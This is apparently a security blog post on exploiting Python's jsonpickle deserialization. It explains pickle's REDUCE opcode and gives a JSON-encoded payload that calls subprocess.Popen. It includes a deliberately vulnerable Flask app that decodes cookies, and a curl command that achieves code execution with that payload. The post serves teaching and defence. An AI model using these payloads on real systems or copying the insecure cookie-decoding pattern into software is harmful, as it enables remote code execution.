Into the Jar | Jsonpickle Exploitation
Overview
Python’s pickle module is its primary mechanism for the serialization and deserialization of Python object structures. This module has also been a target for exploitation when it is used insecurely to load malicious ‘pickle’ streams and reconstruct objects from them. The dangers are so prevalent, in fact, that the pickle documentation explicitly states that it is not intended to be secure against erroneous or maliciously constructed data.
Interestingly enough, a few libraries have popped up over the years that support encoding pickled objects in different formats such as JSON and XML. In this post we will look specifically at jsonpickle, which has aptly been described as a library for serializing any arbitrary object graph into JSON. We will explore whether we can create malicious JSON encoded pickles, how to use them for exploitation through a vulnerable web application, and some techniques for dynamically tracing the library’s functionality at runtime.
Encoding Pickle Objects
The library’s usage is pretty straightforward. You can simply create a new class instance and use jsonpickle’s encode() method to return a JSON encoded pickle. Here is an example from its documentation:
    import jsonpickle

    class User(object):
        def __init__(self, user):
            self.user = user

    encoded = jsonpickle.encode(User("rotlogix"))

    [*] Test: {"py/object": "__main__.User", "user": "rotlogix"}
This is a very nice JSON representation of a pickled object. However, there are a few things we need to understand about how the library encodes and decodes pickles, and how we can build a properly JSON encoded malicious pickle as well.
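To make the output format concrete, here is a rough sketch of how such a document could be produced with the standard library alone. The flatten() helper is hypothetical and is not how jsonpickle is implemented; it assumes a simple object whose attributes are already JSON friendly.

```python
import json


class User(object):
    def __init__(self, user):
        self.user = user


def flatten(obj):
    """Hypothetical helper: tag the class path, then copy instance attributes."""
    cls = type(obj)
    doc = {"py/object": "{0}.{1}".format(cls.__module__, cls.__name__)}
    doc.update(vars(obj))  # only works when attribute values are JSON friendly
    return json.dumps(doc)


encoded = flatten(User("rotlogix"))
print(encoded)
```

The py/object tag is what tells a decoder which class to import and instantiate, which is why the content of these tags matters so much later on.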
Into The Jar
Before we dive into how we are going to construct a valid JSON encoded malicious pickle, let’s revisit some key items about how pickles are reconstructed into Python objects. Included within the pickle architecture is a virtual machine. The pickle virtual machine (PVM) contains three important elements:
1. Instruction Engine
2. Stack
3. Memo
The instruction engine processes the instructions within the pickle stream, and the stack is a typical stack-like structure implemented as a list. The memo is a register-style scratch space, built from an indexed list. The pickle virtual machine takes a pickle stream and attempts to recreate an object based on the instructions it reads. It does this by reconstructing a Python dict from the pickled object, creating a class instance, then populating the class instance from the dictionary elements.
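The instruction stream can be inspected without executing it. The following sketch uses the standard library's pickletools module to list the opcodes of a small protocol 0 pickle; the dictionary being pickled is just an illustrative value.

```python
import pickle
import pickletools

# Protocol 0 is the text-based format used by the streams in this post.
stream = pickle.dumps({"user": "rotlogix"}, protocol=0)

# genops() yields (opcode, argument, position) without executing anything.
opcode_names = []
for opcode, arg, pos in pickletools.genops(stream):
    opcode_names.append(opcode.name)
    print("{0:>3}  {1:<10} {2!r}".format(pos, opcode.name, arg))

# Loading the stream runs those instructions and rebuilds the dict.
restored = pickle.loads(stream)
```

In the listing, the PUT instructions store intermediate values in the memo, while instructions such as SETITEM operate on whatever is currently on the stack.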
There are 55 supported opcodes for pickle within Python 2, but we will only really focus on the REDUCE opcode, which is arguably the most useful for gaining code execution.
REDUCE works by popping two items off the PVM stack; the first item is a tuple that contains arguments, and the second item is a callable. REDUCE will then execute the callable with the argument tuple and push the resulting object back onto the stack. Let’s take a look at this example class and its corresponding shellcode:
    import subprocess

    class Shell(object):
        def __reduce__(self):
            # (callable, argument tuple) consumed by REDUCE at load time
            return (subprocess.Popen, (('whoami'),))
    p0
    (csubprocess
    Popen
    p1
    c__builtin__
    object
    p2
    Ntp3
    Rp4
    (dp5
    S'_child_created'
    p6
    I01
    sS'returncode'
    p7
    NsS'stdout'
    p8
    NsS'stdin'
    p9
    NsS'pid'
    p10
    I67142
    sS'stderr'
    p11
    NsS'universal_newlines'
    p12
    I00
    sb.
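The same REDUCE behavior can be observed safely by swapping the callable for something harmless. In this sketch the Harmless class is an illustrative stand-in (not from the original harness) whose __reduce__ returns the built-in len instead of subprocess.Popen.

```python
import pickle
import pickletools


class Harmless(object):
    def __reduce__(self):
        # (callable, argument tuple): the two items REDUCE pops off the stack.
        return (len, ("whoami",))


stream = pickle.dumps(Harmless(), protocol=0)
opcode_names = [op.name for op, arg, pos in pickletools.genops(stream)]

# Loading the stream calls len("whoami"); no Harmless instance is rebuilt.
result = pickle.loads(stream)
print(opcode_names)
print(result)
```

Whatever the callable returns is what loads() hands back to the caller, so the unpickled "object" here is simply the integer returned by len.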
Without diving into each instruction, we are essentially pushing the module and callable (Popen) onto the stack; REDUCE then pops off the arguments and the callable, calls Popen, and pushes the result back onto the stack. Now that we have a basic understanding of what our pickle shellcode will look like, we can use jsonpickle’s encode method to return the JSON representation:
    encoded = jsonpickle.encode(Shell())

    [*] JSON encoded Pickle: {"py/object": "__main__.Shell", "py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": ["whoami"]}, null, null, null]}
This makes more sense with some prior knowledge of what the instructions look like within the pickle stream. However, we really want to understand what happens when decoding takes place. At a high level, we might assume that jsonpickle takes the JSON format, creates a valid pickle, then reconstructs the object from the pickle.
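The py/reduce entry carries the same two ingredients that REDUCE needs: a callable and an argument tuple. As a minimal sketch of what acting on that entry could look like, the hypothetical resolve() and restore_reduce() helpers below import the named callable and call it. This is an illustration under those assumptions, not jsonpickle's actual code, and it uses len in place of subprocess.Popen so that it is safe to run.

```python
import importlib
import json


def resolve(dotted_name):
    """Import 'package.module.attr' and return the attribute."""
    module_name, _, attr = dotted_name.rpartition(".")
    return getattr(importlib.import_module(module_name), attr)


def restore_reduce(doc):
    """Hypothetical handler: call the py/type callable with the py/tuple args."""
    func_spec, args_spec = doc["py/reduce"][:2]
    func = resolve(func_spec["py/type"])
    return func(*args_spec["py/tuple"])


# Harmless stand-in for the Shell payload: len replaces subprocess.Popen.
# "builtins" is the Python 3 module name (Python 2 calls it __builtin__).
payload = '{"py/reduce": [{"py/type": "builtins.len"}, {"py/tuple": ["whoami"]}]}'
result = restore_reduce(json.loads(payload))
print(result)
```

Any decoder that honors a tag like this lets the document choose the function that gets called, which is the property the rest of this post relies on.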
Tracing
Built into Python’s sys module is a function called settrace(). You use it by passing a callback that receives the current stack frame, the name of the event, and an event-specific argument. It is relatively simple to use this for basic function tracing within a Python program. I will leverage the example code here -> http://pymotw.com/2/sys/tracing.html to trace every time a ‘call’ is made within the application we are using to test jsonpickle. For those who aren’t already familiar with pickle’s vulnerable functions, we really only care about calls being made to loads(). loads() reads a pickle object hierarchy from a string, deserializes the pickle stream, and reconstructs our object. As you can imagine, if you pass untrusted data into the loads() function, you will wind up with code execution.
    import sys

    def trace(frame, event, arg):
        # settrace() callbacks receive (frame, event, arg); only 'call' events matter here
        if event != 'call':
            return
        c_object = frame.f_code
        func_name = c_object.co_name
        func_name_line_no = frame.f_lineno
        func_filename = c_object.co_filename
        caller = frame.f_back
        caller_line_no = caller.f_lineno
        caller_filename = caller.f_code.co_filename
        print('Call to {0} on line {1} of {2} from line {3} of {4}'.format(
            func_name, func_name_line_no, func_filename, caller_line_no, caller_filename))

    # Install the callback before decoding the JSON pickle
    sys.settrace(trace)
Here are the results after running our program with settrace():
    [*] JSON encoded Pickle: {"py/object": "__main__.Shell", "py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": ["whoami"]}, null, null, null]}
    [*] Reconstructing object from JSON Pickle ...
    Call to decode on line 134 of /usr/local/lib/python2.7/site-packages/jsonpickle/__init__.py from line 34 of json_pickle_sploit.py
    Call to decode on line 21 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py from line 148 of /usr/local/lib/python2.7/site-packages/jsonpickle/__init__.py
    Call to _make_backend on line 29 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py from line 23 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py
    Call to __init__ on line 84 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py from line 25 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py
    Call to _make_backend on line 29 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py from line 85 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py
    Call to reset on line 91 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py from line 89 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py
    Call to decode on line 175 of /usr/local/lib/python2.7/site-packages/jsonpickle/backend.py from line 26 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py
    Call to _verify on line 50 of /usr/local/lib/python2.7/site-packages/jsonpickle/backend.py from line 183 of /usr/local/lib/python2.7/site-packages/jsonpickle/backend.py
    Call to backend_decode on line 200 of /usr/local/lib/python2.7/site-packages/jsonpickle/backend.py from line 191 of /usr/local/lib/python2.7/site-packages/jsonpickle/backend.py
    Call to loads on line 293 of /usr/local/Cellar/python/2.7.9/Frameworks/Python.framework/Versions/2.7/lib/python2.7/json/__init__.py from line 201 of /usr/local/lib/python2.7/site-packages/jsonpickle/backend.py
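Sure enough, when we call decode() on the JSON encoded pickle, the library eventually calls loads(). Note that the loads() shown in this trace lives in the standard library’s json module (json/__init__.py), so at this point the library is parsing the JSON text; jsonpickle’s unpickler then rebuilds the object from the parsed py/object and py/reduce entries.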
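When reading a trace like the one above, it helps to know which module a given loads() belongs to. The sketch below is a small variation on the tracer that records only calls to functions named loads, together with the file that defines them. The trace_loads() callback and run_traced() helper are hypothetical names, and the example traces json.loads from the standard library so that it runs without jsonpickle installed.

```python
import json
import sys

calls = []


def trace_loads(frame, event, arg):
    # Record only 'call' events for functions named loads.
    if event == "call" and frame.f_code.co_name == "loads":
        calls.append((frame.f_code.co_name, frame.f_code.co_filename))
    return None  # no per-line tracing inside the called function


def run_traced(func, *args):
    """Run func under the tracer and always remove the tracer afterwards."""
    sys.settrace(trace_loads)
    try:
        return func(*args)
    finally:
        sys.settrace(None)


value = run_traced(json.loads, '{"user": "rotlogix"}')
for name, filename in calls:
    print("Call to {0} in {1}".format(name, filename))
```

Filtering inside the callback keeps the output short, and removing the tracer in a finally block avoids leaving it installed if the traced call raises.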
Exploitation
What would this look like in a real-world scenario? Taking a cue from past pickle related vulnerabilities within Python web frameworks, I have built a vulnerable Flask web application that insecurely calls decode() on a cookie, which can be leveraged for remote code execution. Let’s take a look at the code:
    @app.route('/')
    def index():
        if request.cookies.get("username"):
            u = jsonpickle.decode(base64.b64decode(request.cookies.get("username")))
            return render_template("index.html", username=u.username)
        else:
            w = redirect("/whoami")
            response = current_app.make_response(w)
            u = User("Guest")
            encoded = base64.b64encode(jsonpickle.encode(u))
            response.set_cookie("username", value=encoded)
            return response

    @app.route('/whoami')
    def whoami():
        user = jsonpickle.decode(base64.b64decode(request.cookies.get("username")))
        username = user.username
        return render_template("whoami.html", username=username)
I’m sure you can already spot the vulnerability! Now we can take our previous JSON encoded malicious pickle, base64 encode it, and deliver it to our vulnerable web application. The Flask application will base64 decode the cookie and call decode() on the JSON encoded pickle, which reconstructs the object from the JSON representation and, in doing so, invokes the callable named in py/reduce.
    ┌[rotlogix@partygoblin] [/dev/ttys005]
    └[~]> curl -v --cookie "username=eyJweS9vYmplY3QiOiAiX19tYWluX18uU2hlbGwiLCAicHkvcmVkdWNlIjogW3sicHkvdHlwZSI6ICJzdWJwcm9jZXNzLlBvcGVuIn0sIHsicHkvdHVwbGUiOiBbIndob2FtaSJdfSwgbnVsbCwgbnVsbCwgbnVsbF19" http://127.0.0.1:5000/

    ┌[rotlogix@partygoblin] [/dev/ttys001]
    └[~/Development/flask-json-pickle]> python flask-json-pickle.py
     * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
     * Restarting with stat
    rotlogix
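A cookie value of the same form can be produced with the standard library alone. This sketch rebuilds the JSON document from earlier as a plain dict, base64 encodes it, and then repeats the first two steps the server performs; it deliberately stops before jsonpickle.decode(), so nothing is executed. The variable names are illustrative.

```python
import base64
import json

# The JSON document from the article, rebuilt as a plain dict.
document = {
    "py/object": "__main__.Shell",
    "py/reduce": [
        {"py/type": "subprocess.Popen"},
        {"py/tuple": ["whoami"]},
        None,
        None,
        None,
    ],
}

# Client side: serialize and base64 encode for use as the cookie value.
cookie_value = base64.b64encode(json.dumps(document).encode("utf-8")).decode("ascii")

# Server side, up to (but not including) jsonpickle.decode().
decoded_text = base64.b64decode(cookie_value).decode("utf-8")
parsed = json.loads(decoded_text)
print(cookie_value)
```

Base64 only changes how the document is transported; the py/reduce entry arrives at the server intact.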
Wrapping Up
I think it is safe to say that whether you are using pickle or a library that supports encoding pickle objects into different formats, you should always consider the ramifications of loading untrusted data into sensitive functions like decode() and loads(). If you would like to experiment with the vulnerable Flask web application and jsonpickle harness, check out our repo -> https://github.com/VerSprite/flask-json-pickle
References
http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf
https://docs.python.org/3.4/library/pickle.html#module-pickle
http://jsonpickle.github.io/#module-jsonpickle
http://pymotw.com/2/sys/tracing.html
http://svn.python.org/projects/python/trunk/Lib/pickletools.py